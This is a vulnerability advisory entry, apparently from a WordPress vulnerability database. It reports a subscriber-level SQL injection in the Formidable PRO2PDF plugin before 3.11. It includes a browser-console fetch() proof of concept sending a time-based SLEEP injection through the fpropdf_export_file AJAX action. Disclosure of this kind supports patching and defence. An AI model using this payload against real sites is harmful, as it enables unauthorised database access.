Lucene search

K
wpexploitWpvulndbWPEX-ID:DFA283F6-B0F3-4AA1-9FC4-52E2474C9F80
HistoryMar 22, 2023 - 12:00 a.m.

Formidable PRO2PDF < 3.11 - Subscriber+ SQLi

2023-03-2200:00:00
wpvulndb
63
web browser command sql injection

0.001 Low

EPSS

Percentile

31.1%

The plugin does not properly sanitise and escape the fieldmap parameter before using it in a SQL statement via the fpropdf_export_file AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=fpropdf_export_file&fieldmap=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

31.1%

Related for WPEX-ID:DFA283F6-B0F3-4AA1-9FC4-52E2474C9F80